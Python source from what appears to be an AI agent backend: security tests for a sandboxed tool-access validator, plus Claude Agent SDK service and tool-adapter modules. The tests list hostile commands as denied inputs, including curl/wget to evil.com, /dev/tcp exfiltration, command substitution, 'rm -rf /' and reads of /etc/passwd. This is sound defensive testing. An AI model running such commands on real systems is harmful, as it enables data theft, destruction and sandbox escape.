def test_glob_within_workspace_allowed():
|
||||
result = _validate_tool_access("Glob", {"path": f"{SDK_CWD}/src"}, sdk_cwd=SDK_CWD)
|
||||
assert result == {}
|
||||
|
||||
|
||||
def test_grep_within_workspace_allowed():
|
||||
result = _validate_tool_access("Grep", {"path": f"{SDK_CWD}/src"}, sdk_cwd=SDK_CWD)
|
||||
assert result == {}
|
||||
|
||||
|
||||
def test_read_outside_workspace_denied():
|
||||
result = _validate_tool_access(
|
||||
"Read", {"file_path": "/etc/passwd"}, sdk_cwd=SDK_CWD
|
||||
)
|
||||
assert _is_denied(result)
|
||||
|
||||
|
||||
def test_write_outside_workspace_denied():
|
||||
result = _validate_tool_access(
|
||||
"Write", {"file_path": "/home/user/secrets.txt"}, sdk_cwd=SDK_CWD
|
||||
)
|
||||
assert _is_denied(result)
|
||||
|
||||
|
||||
def test_traversal_attack_denied():
|
||||
result = _validate_tool_access(
|
||||
"Read",
|
||||
{"file_path": f"{SDK_CWD}/../../etc/passwd"},
|
||||
sdk_cwd=SDK_CWD,
|
||||
)
|
||||
assert _is_denied(result)
|
||||
|
||||
|
||||
def test_no_path_allowed():
|
||||
"""Glob/Grep without a path argument defaults to cwd — should pass."""
|
||||
result = _validate_tool_access("Glob", {}, sdk_cwd=SDK_CWD)
|
||||
assert result == {}
|
||||
|
||||
|
||||
def test_read_no_cwd_denies_absolute():
|
||||
"""If no sdk_cwd is set, absolute paths are denied."""
|
||||
result = _validate_tool_access("Read", {"file_path": "/tmp/anything"})
|
||||
assert _is_denied(result)
|
||||
|
||||
|
||||
# -- Tool-results directory --------------------------------------------------
|
||||
|
||||
|
||||
def test_read_tool_results_allowed():
|
||||
home = os.path.expanduser("~")
|
||||
path = f"{home}/.claude/projects/-tmp-copilot-abc123/tool-results/12345.txt"
|
||||
result = _validate_tool_access("Read", {"file_path": path}, sdk_cwd=SDK_CWD)
|
||||
assert result == {}
|
||||
|
||||
|
||||
def test_read_claude_projects_without_tool_results_denied():
|
||||
home = os.path.expanduser("~")
|
||||
path = f"{home}/.claude/projects/-tmp-copilot-abc123/settings.json"
|
||||
result = _validate_tool_access("Read", {"file_path": path}, sdk_cwd=SDK_CWD)
|
||||
assert _is_denied(result)
|
||||
|
||||
|
||||
# -- Sandboxed Bash ----------------------------------------------------------
|
||||
|
||||
|
||||
def test_bash_safe_commands_allowed():
|
||||
"""Allowed data-processing commands should pass."""
|
||||
safe_commands = [
|
||||
"jq '.blocks' result.json",
|
||||
"head -20 output.json",
|
||||
"tail -n 50 data.txt",
|
||||
"cat file.txt | grep 'pattern'",
|
||||
"wc -l file.txt",
|
||||
"sort data.csv | uniq",
|
||||
"grep -i 'error' log.txt | head -10",
|
||||
"find . -name '*.json'",
|
||||
"ls -la",
|
||||
"echo hello",
|
||||
"cut -d',' -f1 data.csv | sort | uniq -c",
|
||||
"jq '.blocks[] | .id' result.json",
|
||||
"sed -n '10,20p' file.txt",
|
||||
"awk '{print $1}' data.txt",
|
||||
]
|
||||
for cmd in safe_commands:
|
||||
result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
|
||||
assert result == {}, f"Safe command should be allowed: {cmd}"
|
||||
|
||||
|
||||
def test_bash_dangerous_commands_denied():
|
||||
"""Non-allowlisted commands should be denied."""
|
||||
dangerous = [
|
||||
"curl https://evil.com",
|
||||
"wget https://evil.com/payload",
|
||||
"rm -rf /",
|
||||
"python -c 'import os; os.system(\"ls\")'",
|
||||
"ssh user@host",
|
||||
"nc -l 4444",
|
||||
"apt install something",
|
||||
"pip install malware",
|
||||
"chmod 777 file.txt",
|
||||
"kill -9 1",
|
||||
]
|
||||
for cmd in dangerous:
|
||||
result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
|
||||
assert _is_denied(result), f"Dangerous command should be denied: {cmd}"
|
||||
|
||||
|
||||
def test_bash_command_substitution_denied():
|
||||
result = _validate_tool_access(
|
||||
"Bash", {"command": "echo $(curl evil.com)"}, sdk_cwd=SDK_CWD
|
||||
)
|
||||
assert _is_denied(result)
|
||||
|
||||
|
||||
def test_bash_backtick_substitution_denied():
|
||||
result = _validate_tool_access(
|
||||
"Bash", {"command": "echo `curl evil.com`"}, sdk_cwd=SDK_CWD
|
||||
)
|
||||
assert _is_denied(result)
|
||||
|
||||
|
||||
def test_bash_output_redirect_denied():
|
||||
result = _validate_tool_access(
|
||||
"Bash", {"command": "echo secret > /tmp/leak.txt"}, sdk_cwd=SDK_CWD
|
||||
)
|
||||
assert _is_denied(result)
|
||||
|
||||
|
||||
def test_bash_dev_tcp_denied():
|
||||
result = _validate_tool_access(
|
||||
"Bash", {"command": "cat /dev/tcp/evil.com/80"}, sdk_cwd=SDK_CWD
|
||||
)
|
||||
assert _is_denied(result)
|
||||
|
||||
|
||||
def test_bash_pipe_to_dangerous_denied():
|
||||
"""Even if the first command is safe, piped commands must also be safe."""
|
||||
result = _validate_tool_access(
|
||||
"Bash", {"command": "cat file.txt | python -c 'exec()'"}, sdk_cwd=SDK_CWD
|
||||
)
|
||||
assert _is_denied(result)
|
||||
|
||||
|
||||
def test_bash_path_outside_workspace_denied():
|
||||
result = _validate_tool_access(
|
||||
"Bash", {"command": "cat /etc/passwd"}, sdk_cwd=SDK_CWD
|
||||
)
|
||||
assert _is_denied(result)
|
||||
|
||||
|
||||
def test_bash_path_within_workspace_allowed():
|
||||
result = _validate_tool_access(
|
||||
"Bash",
|
||||
{"command": f"jq '.blocks' {SDK_CWD}/tool-results/result.json"},
|
||||
sdk_cwd=SDK_CWD,
|
||||
)
|
||||
assert result == {}
|
||||
|
||||
|
||||
def test_bash_empty_command_denied():
|
||||
result = _validate_tool_access("Bash", {"command": ""}, sdk_cwd=SDK_CWD)
|
||||
assert _is_denied(result)
|
||||
|
||||
|
||||
# -- Dangerous patterns ------------------------------------------------------
|
||||
|
||||
|
||||
def test_dangerous_pattern_blocked():
|
||||
result = _validate_tool_access("SomeTool", {"cmd": "sudo rm -rf /"})
|
||||
assert _is_denied(result)
|
||||
|
||||
|
||||
def test_subprocess_pattern_blocked():
|
||||
result = _validate_tool_access("SomeTool", {"code": "subprocess.run(...)"})
|
||||
assert _is_denied(result)
|
||||
|
||||
|
||||
# -- User isolation ----------------------------------------------------------
|
||||
|
||||
|
||||
def test_workspace_path_traversal_blocked():
|
||||
result = _validate_user_isolation(
|
||||
"workspace_read", {"path": "../../../etc/shadow"}, user_id="user-1"
|
||||
)
|
||||
assert _is_denied(result)
|
||||
|
||||
|
||||
def test_workspace_absolute_path_blocked():
|
||||
result = _validate_user_isolation(
|
||||
"workspace_read", {"path": "/etc/passwd"}, user_id="user-1"
|
||||
)
|
||||
assert _is_denied(result)
|
||||
|
||||
|
||||
def test_workspace_normal_path_allowed():
|
||||
result = _validate_user_isolation(
|
||||
"workspace_read", {"path": "src/main.py"}, user_id="user-1"
|
||||
)
|
||||
assert result == {}
|
||||
|
||||
|
||||
def test_non_workspace_tool_passes_isolation():
|
||||
result = _validate_user_isolation(
|
||||
"find_agent", {"query": "email"}, user_id="user-1"
|
||||
)
|
||||
assert result == {}
|
||||
@@ -1,453 +0,0 @@
|
||||
"""Claude Agent SDK service layer for CoPilot chat completions."""
|
||||
|
||||
import asyncio
|
||||
import json
|
||||
import logging
|
||||
import os
|
||||
import re
|
||||
import uuid
|
||||
from collections.abc import AsyncGenerator
|
||||
from typing import Any
|
||||
|
||||
from backend.util.exceptions import NotFoundError
|
||||
|
||||
from ..config import ChatConfig
|
||||
from ..model import (
|
||||
ChatMessage,
|
||||
ChatSession,
|
||||
get_chat_session,
|
||||
update_session_title,
|
||||
upsert_chat_session,
|
||||
)
|
||||
from ..response_model import (
|
||||
StreamBaseResponse,
|
||||
StreamError,
|
||||
StreamFinish,
|
||||
StreamStart,
|
||||
StreamTextDelta,
|
||||
StreamToolInputAvailable,
|
||||
StreamToolOutputAvailable,
|
||||
)
|
||||
from ..service import _build_system_prompt, _generate_session_title
|
||||
from ..tracking import track_user_message
|
||||
from .anthropic_fallback import stream_with_anthropic
|
||||
from .response_adapter import SDKResponseAdapter
|
||||
from .security_hooks import create_security_hooks
|
||||
from .tool_adapter import (
|
||||
COPILOT_TOOL_NAMES,
|
||||
create_copilot_mcp_server,
|
||||
set_execution_context,
|
||||
)
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
config = ChatConfig()
|
||||
|
||||
# Set to hold background tasks to prevent garbage collection
|
||||
_background_tasks: set[asyncio.Task[Any]] = set()
|
||||
|
||||
|
||||
_SDK_CWD_PREFIX = "/tmp/copilot-"
|
||||
|
||||
# Appended to the system prompt to inform the agent about Bash restrictions.
|
||||
# The SDK already describes each tool (Read, Write, Edit, Glob, Grep, Bash),
|
||||
# but it doesn't know about our security hooks' command allowlist for Bash.
|
||||
_SDK_TOOL_SUPPLEMENT = """
|
||||
|
||||
## Bash restrictions
|
||||
|
||||
The Bash tool is restricted to safe, read-only data-processing commands:
|
||||
jq, grep, head, tail, cat, wc, sort, uniq, cut, tr, sed, awk, find, ls,
|
||||
echo, diff, base64, and similar utilities.
|
||||
Network commands (curl, wget), destructive commands (rm, chmod), and
|
||||
interpreters (python, node) are NOT available.
|
||||
"""
|
||||
|
||||
|
||||
def _make_sdk_cwd(session_id: str) -> str:
|
||||
"""Create a safe, session-specific working directory path.
|
||||
|
||||
Sanitizes session_id, then validates the resulting path stays under /tmp/
|
||||
using normpath + startswith (the pattern CodeQL recognises as a sanitizer).
|
||||
"""
|
||||
safe_id = re.sub(r"[^A-Za-z0-9-]", "", session_id)
|
||||
cwd = os.path.normpath(f"{_SDK_CWD_PREFIX}{safe_id}")
|
||||
if not cwd.startswith(_SDK_CWD_PREFIX):
|
||||
raise ValueError(f"Session path escaped prefix: {cwd}")
|
||||
return cwd
|
||||
|
||||
|
||||
def _cleanup_sdk_tool_results(cwd: str) -> None:
|
||||
"""Remove SDK tool-result files for a specific session working directory.
|
||||
|
||||
The SDK creates tool-result files under ~/.claude/projects/<encoded-cwd>/tool-results/.
|
||||
We clean only the specific cwd's results to avoid race conditions between
|
||||
concurrent sessions.
|
||||
"""
|
||||
import glob as _glob
|
||||
import shutil
|
||||
|
||||
# Validate cwd is under the expected prefix (CodeQL sanitizer pattern)
|
||||
normalized = os.path.normpath(cwd)
|
||||
if not normalized.startswith(_SDK_CWD_PREFIX):
|
||||
return
|
||||
|
||||
# SDK encodes the cwd path by replacing '/' with '-'
|
||||
encoded_cwd = normalized.replace("/", "-")
|
||||
project_dir = os.path.expanduser(f"~/.claude/projects/{encoded_cwd}")
|
||||
results_glob = os.path.join(project_dir, "tool-results", "*")
|
||||
|
||||
for path in _glob.glob(results_glob):
|
||||
try:
|
||||
os.remove(path)
|
||||
except OSError:
|
||||
pass
|
||||
|
||||
# Also clean up the temp cwd directory itself
|
||||
try:
|
||||
shutil.rmtree(normalized, ignore_errors=True)
|
||||
except OSError:
|
||||
pass
|
||||
|
||||
|
||||
async def _compress_conversation_history(
|
||||
session: ChatSession,
|
||||
) -> list[ChatMessage]:
|
||||
"""Compress prior conversation messages if they exceed the token threshold.
|
||||
|
||||
Uses the shared compress_context() from prompt.py which supports:
|
||||
- LLM summarization of old messages (keeps recent ones intact)
|
||||
- Progressive content truncation as fallback
|
||||
- Middle-out deletion as last resort
|
||||
|
||||
Returns the compressed prior messages (everything except the current message).
|
||||
"""
|
||||
prior = session.messages[:-1]
|
||||
if len(prior) < 2:
|
||||
return prior
|
||||
|
||||
from backend.util.prompt import compress_context
|
||||
|
||||
# Convert ChatMessages to dicts for compress_context
|
||||
messages_dict = []
|
||||
for msg in prior:
|
||||
msg_dict: dict[str, Any] = {"role": msg.role}
|
||||
if msg.content:
|
||||
msg_dict["content"] = msg.content
|
||||
if msg.tool_calls:
|
||||
msg_dict["tool_calls"] = msg.tool_calls
|
||||
if msg.tool_call_id:
|
||||
msg_dict["tool_call_id"] = msg.tool_call_id
|
||||
messages_dict.append(msg_dict)
|
||||
|
||||
try:
|
||||
import openai
|
||||
|
||||
async with openai.AsyncOpenAI(
|
||||
api_key=config.api_key, base_url=config.base_url, timeout=30.0
|
||||
) as client:
|
||||
result = await compress_context(
|
||||
messages=messages_dict,
|
||||
model=config.model,
|
||||
client=client,
|
||||
)
|
||||
except Exception as e:
|
||||
logger.warning(f"[SDK] Context compression with LLM failed: {e}")
|
||||
# Fall back to truncation-only (no LLM summarization)
|
||||
result = await compress_context(
|
||||
messages=messages_dict,
|
||||
model=config.model,
|
||||
client=None,
|
||||
)
|
||||
|
||||
if result.was_compacted:
|
||||
logger.info(
|
||||
f"[SDK] Context compacted: {result.original_token_count} -> "
|
||||
f"{result.token_count} tokens "
|
||||
f"({result.messages_summarized} summarized, "
|
||||
f"{result.messages_dropped} dropped)"
|
||||
)
|
||||
# Convert compressed dicts back to ChatMessages
|
||||
return [
|
||||
ChatMessage(
|
||||
role=m["role"],
|
||||
content=m.get("content"),
|
||||
tool_calls=m.get("tool_calls"),
|
||||
tool_call_id=m.get("tool_call_id"),
|
||||
)
|
||||
for m in result.messages
|
||||
]
|
||||
|
||||
return prior
|
||||
|
||||
|
||||
def _format_conversation_context(messages: list[ChatMessage]) -> str | None:
|
||||
"""Format conversation messages into a context prefix for the user message.
|
||||
|
||||
Returns a string like:
|
||||
<conversation_history>
|
||||
User: hello
|
||||
You responded: Hi! How can I help?
|
||||
</conversation_history>
|
||||
|
||||
Returns None if there are no messages to format.
|
||||
"""
|
||||
if not messages:
|
||||
return None
|
||||
|
||||
lines: list[str] = []
|
||||
for msg in messages:
|
||||
if not msg.content:
|
||||
continue
|
||||
if msg.role == "user":
|
||||
lines.append(f"User: {msg.content}")
|
||||
elif msg.role == "assistant":
|
||||
lines.append(f"You responded: {msg.content}")
|
||||
# Skip tool messages — they're internal details
|
||||
|
||||
if not lines:
|
||||
return None
|
||||
|
||||
return "<conversation_history>\n" + "\n".join(lines) + "\n</conversation_history>"
|
||||
|
||||
|
||||
async def stream_chat_completion_sdk(
|
||||
session_id: str,
|
||||
message: str | None = None,
|
||||
tool_call_response: str | None = None, # noqa: ARG001
|
||||
is_user_message: bool = True,
|
||||
user_id: str | None = None,
|
||||
retry_count: int = 0, # noqa: ARG001
|
||||
session: ChatSession | None = None,
|
||||
context: dict[str, str] | None = None, # noqa: ARG001
|
||||
) -> AsyncGenerator[StreamBaseResponse, None]:
|
||||
"""Stream chat completion using Claude Agent SDK.
|
||||
|
||||
Drop-in replacement for stream_chat_completion with improved reliability.
|
||||
"""
|
||||
|
||||
if session is None:
|
||||
session = await get_chat_session(session_id, user_id)
|
||||
|
||||
if not session:
|
||||
raise NotFoundError(
|
||||
f"Session {session_id} not found. Please create a new session first."
|
||||
)
|
||||
|
||||
if message:
|
||||
session.messages.append(
|
||||
ChatMessage(
|
||||
role="user" if is_user_message else "assistant", content=message
|
||||
)
|
||||
)
|
||||
if is_user_message:
|
||||
track_user_message(
|
||||
user_id=user_id, session_id=session_id, message_length=len(message)
|
||||
)
|
||||
|
||||
session = await upsert_chat_session(session)
|
||||
|
||||
# Generate title for new sessions (first user message)
|
||||
if is_user_message and not session.title:
|
||||
user_messages = [m for m in session.messages if m.role == "user"]
|
||||
if len(user_messages) == 1:
|
||||
first_message = user_messages[0].content or message or ""
|
||||
if first_message:
|
||||
task = asyncio.create_task(
|
||||
_update_title_async(session_id, first_message, user_id)
|
||||
)
|
||||
_background_tasks.add(task)
|
||||
task.add_done_callback(_background_tasks.discard)
|
||||
|
||||
# Build system prompt (reuses non-SDK path with Langfuse support)
|
||||
has_history = len(session.messages) > 1
|
||||
system_prompt, _ = await _build_system_prompt(
|
||||
user_id, has_conversation_history=has_history
|
||||
)
|
||||
system_prompt += _SDK_TOOL_SUPPLEMENT
|
||||
message_id = str(uuid.uuid4())
|
||||
text_block_id = str(uuid.uuid4())
|
||||
task_id = str(uuid.uuid4())
|
||||
|
||||
yield StreamStart(messageId=message_id, taskId=task_id)
|
||||
|
||||
stream_completed = False
|
||||
# Use a session-specific temp dir to avoid cleanup race conditions
|
||||
# between concurrent sessions.
|
||||
sdk_cwd = _make_sdk_cwd(session_id)
|
||||
os.makedirs(sdk_cwd, exist_ok=True)
|
||||
|
||||
set_execution_context(user_id, session, None)
|
||||
|
||||
try:
|
||||
try:
|
||||
from claude_agent_sdk import ClaudeAgentOptions, ClaudeSDKClient
|
||||
|
||||
mcp_server = create_copilot_mcp_server()
|
||||
|
||||
options = ClaudeAgentOptions(
|
||||
system_prompt=system_prompt,
|
||||
mcp_servers={"copilot": mcp_server}, # type: ignore[arg-type]
|
||||
allowed_tools=COPILOT_TOOL_NAMES,
|
||||
hooks=create_security_hooks(user_id, sdk_cwd=sdk_cwd), # type: ignore[arg-type]
|
||||
cwd=sdk_cwd,
|
||||
)
|
||||
|
||||
adapter = SDKResponseAdapter(message_id=message_id)
|
||||
adapter.set_task_id(task_id)
|
||||
|
||||
async with ClaudeSDKClient(options=options) as client:
|
||||
current_message = message or ""
|
||||
if not current_message and session.messages:
|
||||
last_user = [m for m in session.messages if m.role == "user"]
|
||||
if last_user:
|
||||
current_message = last_user[-1].content or ""
|
||||
|
||||
if not current_message.strip():
|
||||
yield StreamError(
|
||||
errorText="Message cannot be empty.",
|
||||
code="empty_prompt",
|
||||
)
|
||||
yield StreamFinish()
|
||||
return
|
||||
|
||||
# Build query with conversation history context.
|
||||
# Compress history first to handle long conversations.
|
||||
query_message = current_message
|
||||
if len(session.messages) > 1:
|
||||
compressed = await _compress_conversation_history(session)
|
||||
history_context = _format_conversation_context(compressed)
|
||||
if history_context:
|
||||
query_message = (
|
||||
f"{history_context}\n\n"
|
||||
f"Now, the user says:\n{current_message}"
|
||||
)
|
||||
|
||||
logger.info(
|
||||
f"[SDK] Sending query: {current_message[:80]!r}"
|
||||
f" ({len(session.messages)} msgs in session)"
|
||||
)
|
||||
await client.query(query_message, session_id=session_id)
|
||||
|
||||
assistant_response = ChatMessage(role="assistant", content="")
|
||||
accumulated_tool_calls: list[dict[str, Any]] = []
|
||||
has_appended_assistant = False
|
||||
has_tool_results = False
|
||||
|
||||
async for sdk_msg in client.receive_messages():
|
||||
logger.debug(
|
||||
f"[SDK] Received: {type(sdk_msg).__name__} "
|
||||
f"{getattr(sdk_msg, 'subtype', '')}"
|
||||
)
|
||||
for response in adapter.convert_message(sdk_msg):
|
||||
if isinstance(response, StreamStart):
|
||||
continue
|
||||
yield response
|
||||
|
||||
if isinstance(response, StreamTextDelta):
|
||||
delta = response.delta or ""
|
||||
# After tool results, start a new assistant
|
||||
# message for the post-tool text.
|
||||
if has_tool_results and has_appended_assistant:
|
||||
assistant_response = ChatMessage(
|
||||
role="assistant", content=delta
|
||||
)
|
||||
accumulated_tool_calls = []
|
||||
has_appended_assistant = False
|
||||
has_tool_results = False
|
||||
session.messages.append(assistant_response)
|
||||
has_appended_assistant = True
|
||||
else:
|
||||
assistant_response.content = (
|
||||
assistant_response.content or ""
|
||||
) + delta
|
||||
if not has_appended_assistant:
|
||||
session.messages.append(assistant_response)
|
||||
has_appended_assistant = True
|
||||
|
||||
elif isinstance(response, StreamToolInputAvailable):
|
||||
accumulated_tool_calls.append(
|
||||
{
|
||||
"id": response.toolCallId,
|
||||
"type": "function",
|
||||
"function": {
|
||||
"name": response.toolName,
|
||||
"arguments": json.dumps(response.input or {}),
|
||||
},
|
||||
}
|
||||
)
|
||||
assistant_response.tool_calls = accumulated_tool_calls
|
||||
if not has_appended_assistant:
|
||||
session.messages.append(assistant_response)
|
||||
has_appended_assistant = True
|
||||
|
||||
elif isinstance(response, StreamToolOutputAvailable):
|
||||
session.messages.append(
|
||||
ChatMessage(
|
||||
role="tool",
|
||||
content=(
|
||||
response.output
|
||||
if isinstance(response.output, str)
|
||||
else str(response.output)
|
||||
),
|
||||
tool_call_id=response.toolCallId,
|
||||
)
|
||||
)
|
||||
has_tool_results = True
|
||||
|
||||
elif isinstance(response, StreamFinish):
|
||||
stream_completed = True
|
||||
|
||||
if stream_completed:
|
||||
break
|
||||
|
||||
if (
|
||||
assistant_response.content or assistant_response.tool_calls
|
||||
) and not has_appended_assistant:
|
||||
session.messages.append(assistant_response)
|
||||
|
||||
except ImportError:
|
||||
logger.warning(
|
||||
"[SDK] claude-agent-sdk not available, using Anthropic fallback"
|
||||
)
|
||||
async for response in stream_with_anthropic(
|
||||
session, system_prompt, text_block_id
|
||||
):
|
||||
if isinstance(response, StreamFinish):
|
||||
stream_completed = True
|
||||
yield response
|
||||
|
||||
await upsert_chat_session(session)
|
||||
logger.debug(
|
||||
f"[SDK] Session {session_id} saved with {len(session.messages)} messages"
|
||||
)
|
||||
if not stream_completed:
|
||||
yield StreamFinish()
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"[SDK] Error: {e}", exc_info=True)
|
||||
try:
|
||||
await upsert_chat_session(session)
|
||||
except Exception as save_err:
|
||||
logger.error(f"[SDK] Failed to save session on error: {save_err}")
|
||||
yield StreamError(
|
||||
errorText="An error occurred. Please try again.",
|
||||
code="sdk_error",
|
||||
)
|
||||
yield StreamFinish()
|
||||
finally:
|
||||
_cleanup_sdk_tool_results(sdk_cwd)
|
||||
|
||||
|
||||
async def _update_title_async(
|
||||
session_id: str, message: str, user_id: str | None = None
|
||||
) -> None:
|
||||
"""Background task to update session title."""
|
||||
try:
|
||||
title = await _generate_session_title(
|
||||
message, user_id=user_id, session_id=session_id
|
||||
)
|
||||
if title:
|
||||
await update_session_title(session_id, title)
|
||||
logger.debug(f"[SDK] Generated title for {session_id}: {title}")
|
||||
except Exception as e:
|
||||
logger.warning(f"[SDK] Failed to update session title: {e}")
|
||||
@@ -1,321 +0,0 @@
|
||||
"""Tool adapter for wrapping existing CoPilot tools as Claude Agent SDK MCP tools.
|
||||
|
||||
This module provides the adapter layer that converts existing BaseTool implementations
|
||||
into in-process MCP tools that can be used with the Claude Agent SDK.
|
||||
"""
|
||||
|
||||
import json
|
||||
import logging
|
||||
import os
|
||||
import uuid
|
||||
from contextvars import ContextVar
|
||||
from typing import Any
|
||||
|
||||
from backend.api.features.chat.model import ChatSession
|
||||
from backend.api.features.chat.tools import TOOL_REGISTRY
|
||||
from backend.api.features.chat.tools.base import BaseTool
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
# Allowed base directory for the Read tool (SDK saves oversized tool results here)
|
||||
_SDK_TOOL_RESULTS_DIR = os.path.expanduser("~/.claude/")
|
||||
|
||||
# MCP server naming - the SDK prefixes tool names as "mcp__{server_name}__{tool}"
|
||||
MCP_SERVER_NAME = "copilot"
|
||||
MCP_TOOL_PREFIX = f"mcp__{MCP_SERVER_NAME}__"
|
||||
|
||||
# Context variables to pass user/session info to tool execution
|
||||
_current_user_id: ContextVar[str | None] = ContextVar("current_user_id", default=None)
|
||||
_current_session: ContextVar[ChatSession | None] = ContextVar(
|
||||
"current_session", default=None
|
||||
)
|
||||
_current_tool_call_id: ContextVar[str | None] = ContextVar(
|
||||
"current_tool_call_id", default=None
|
||||
)
|
||||
|
||||
# Stash for MCP tool outputs before the SDK potentially truncates them.
|
||||
# Keyed by tool_name → full output string. Consumed (popped) by the
|
||||
# response adapter when it builds StreamToolOutputAvailable.
|
||||
_pending_tool_outputs: ContextVar[dict[str, str]] = ContextVar(
|
||||
"pending_tool_outputs", default=None # type: ignore[arg-type]
|
||||
)
|
||||
|
||||
|
||||
def set_execution_context(
|
||||
user_id: str | None,
|
||||
session: ChatSession,
|
||||
tool_call_id: str | None = None,
|
||||
) -> None:
|
||||
"""Set the execution context for tool calls.
|
||||
|
||||
This must be called before streaming begins to ensure tools have access
|
||||
to user_id and session information.
|
||||
"""
|
||||
_current_user_id.set(user_id)
|
||||
_current_session.set(session)
|
||||
_current_tool_call_id.set(tool_call_id)
|
||||
_pending_tool_outputs.set({})
|
||||
|
||||
|
||||
def get_execution_context() -> tuple[str | None, ChatSession | None, str | None]:
|
||||
"""Get the current execution context."""
|
||||
return (
|
||||
_current_user_id.get(),
|
||||
_current_session.get(),
|
||||
_current_tool_call_id.get(),
|
||||
)
|
||||
|
||||
|
||||
def pop_pending_tool_output(tool_name: str) -> str | None:
|
||||
"""Pop and return the stashed full output for *tool_name*.
|
||||
|
||||
The SDK CLI may truncate large tool results (writing them to disk and
|
||||
replacing the content with a file reference). This stash keeps the
|
||||
original MCP output so the response adapter can forward it to the
|
||||
frontend for proper widget rendering.
|
||||
|
||||
Returns ``None`` if nothing was stashed for *tool_name*.
|
||||
"""
|
||||
pending = _pending_tool_outputs.get(None)
|
||||
if pending is None:
|
||||
return None
|
||||
return pending.pop(tool_name, None)
|
||||
|
||||
|
||||
def create_tool_handler(base_tool: BaseTool):
|
||||
"""Create an async handler function for a BaseTool.
|
||||
|
||||
This wraps the existing BaseTool._execute method to be compatible
|
||||
with the Claude Agent SDK MCP tool format.
|
||||
"""
|
||||
|
||||
async def tool_handler(args: dict[str, Any]) -> dict[str, Any]:
|
||||
"""Execute the wrapped tool and return MCP-formatted response."""
|
||||
user_id, session, tool_call_id = get_execution_context()
|
||||
|
||||
if session is None:
|
||||
return {
|
||||
"content": [
|
||||
{
|
||||
"type": "text",
|
||||
"text": json.dumps(
|
||||
{
|
||||
"error": "No session context available",
|
||||
"type": "error",
|
||||
}
|
||||
),
|
||||
}
|
||||
],
|
||||
"isError": True,
|
||||
}
|
||||
|
||||
try:
|
||||
# Call the existing tool's execute method
|
||||
# Generate unique tool_call_id per invocation for proper correlation
|
||||
effective_id = tool_call_id or f"sdk-{uuid.uuid4().hex[:12]}"
|
||||
result = await base_tool.execute(
|
||||
user_id=user_id,
|
||||
session=session,
|
||||
tool_call_id=effective_id,
|
||||
**args,
|
||||
)
|
||||
|
||||
# The result is a StreamToolOutputAvailable, extract the output
|
||||
text = (
|
||||
result.output
|
||||
if isinstance(result.output, str)
|
||||
else json.dumps(result.output)
|
||||
)
|
||||
|
||||
# Stash the full output before the SDK potentially truncates it.
|
||||
# The response adapter will pop this for frontend widget rendering.
|
||||
pending = _pending_tool_outputs.get(None)
|
||||
if pending is not None:
|
||||
pending[base_tool.name] = text
|
||||
|
||||
return {
|
||||
"content": [{"type": "text", "text": text}],
|
||||
"isError": not result.success,
|
||||
}
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Error executing tool {base_tool.name}: {e}", exc_info=True)
|
||||
return {
|
||||
"content": [
|
||||
{
|
||||
"type": "text",
|
||||
"text": json.dumps(
|
||||
{
|
||||
"error": str(e),
|
||||
"type": "error",
|
||||
"message": f"Failed to execute {base_tool.name}",
|
||||
}
|
||||
),
|
||||
}
|
||||
],
|
||||
"isError": True,
|
||||
}
|
||||
|
||||
return tool_handler
|
||||
|
||||
|
||||
def _build_input_schema(base_tool: BaseTool) -> dict[str, Any]:
|
||||
"""Build a JSON Schema input schema for a tool."""
|
||||
return {
|
||||
"type": "object",
|
||||
"properties": base_tool.parameters.get("properties", {}),
|
||||
"required": base_tool.parameters.get("required", []),
|
||||
}
|
||||
|
||||
|
||||
def get_tool_definitions() -> list[dict[str, Any]]:
|
||||
"""Get all tool definitions in MCP format.
|
||||
|
||||
Returns a list of tool definitions that can be used with
|
||||
create_sdk_mcp_server or as raw tool definitions.
|
||||
"""
|
||||
tool_definitions = []
|
||||
|
||||
for tool_name, base_tool in TOOL_REGISTRY.items():
|
||||
tool_def = {
|
||||
"name": tool_name,
|
||||
"description": base_tool.description,
|
||||
"inputSchema": _build_input_schema(base_tool),
|
||||
}
|
||||
tool_definitions.append(tool_def)
|
||||
|
||||
return tool_definitions
|
||||
|
||||
|
||||
def get_tool_handlers() -> dict[str, Any]:
|
||||
"""Get all tool handlers mapped by name.
|
||||
|
||||
Returns a dictionary mapping tool names to their handler functions.
|
||||
"""
|
||||
handlers = {}
|
||||
|
||||
for tool_name, base_tool in TOOL_REGISTRY.items():
|
||||
handlers[tool_name] = create_tool_handler(base_tool)
|
||||
|
||||
return handlers
|
||||
|
||||
|
||||
async def _read_file_handler(args: dict[str, Any]) -> dict[str, Any]:
|
||||
"""Read a file with optional offset/limit. Restricted to SDK working directory.
|
||||
|
||||
After reading, the file is deleted to prevent accumulation in long-running pods.
|
||||
"""
|
||||
file_path = args.get("file_path", "")
|
||||
offset = args.get("offset", 0)
|
||||
limit = args.get("limit", 2000)
|
||||
|
||||
# Security: only allow reads under the SDK's working directory
|
||||
real_path = os.path.realpath(file_path)
|
||||
if not real_path.startswith(_SDK_TOOL_RESULTS_DIR):
|
||||
return {
|
||||
"content": [{"type": "text", "text": f"Access denied: {file_path}"}],
|
||||
"isError": True,
|
||||
}
|
||||
|
||||
try:
|
||||
with open(real_path) as f:
|
||||
lines = f.readlines()
|
||||
selected = lines[offset : offset + limit]
|
||||
content = "".join(selected)
|
||||
return {"content": [{"type": "text", "text": content}], "isError": False}
|
||||
except FileNotFoundError:
|
||||
return {
|
||||
"content": [{"type": "text", "text": f"File not found: {file_path}"}],
|
||||
"isError": True,
|
||||
}
|
||||
except Exception as e:
|
||||
return {
|
||||
"content": [{"type": "text", "text": f"Error reading file: {e}"}],
|
||||
"isError": True,
|
||||
}
|
||||
|
||||
|
||||
_READ_TOOL_NAME = "Read"
|
||||
_READ_TOOL_DESCRIPTION = (
|
||||
"Read a file from the local filesystem. "
|
||||
"Use offset and limit to read specific line ranges for large files."
|
||||
)
|
||||
_READ_TOOL_SCHEMA = {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"file_path": {
|
||||
"type": "string",
|
||||
"description": "The absolute path to the file to read",
|
||||
},
|
||||
"offset": {
|
||||
"type": "integer",
|
||||
"description": "Line number to start reading from (0-indexed). Default: 0",
|
||||
},
|
||||
"limit": {
|
||||
"type": "integer",
|
||||
"description": "Number of lines to read. Default: 2000",
|
||||
},
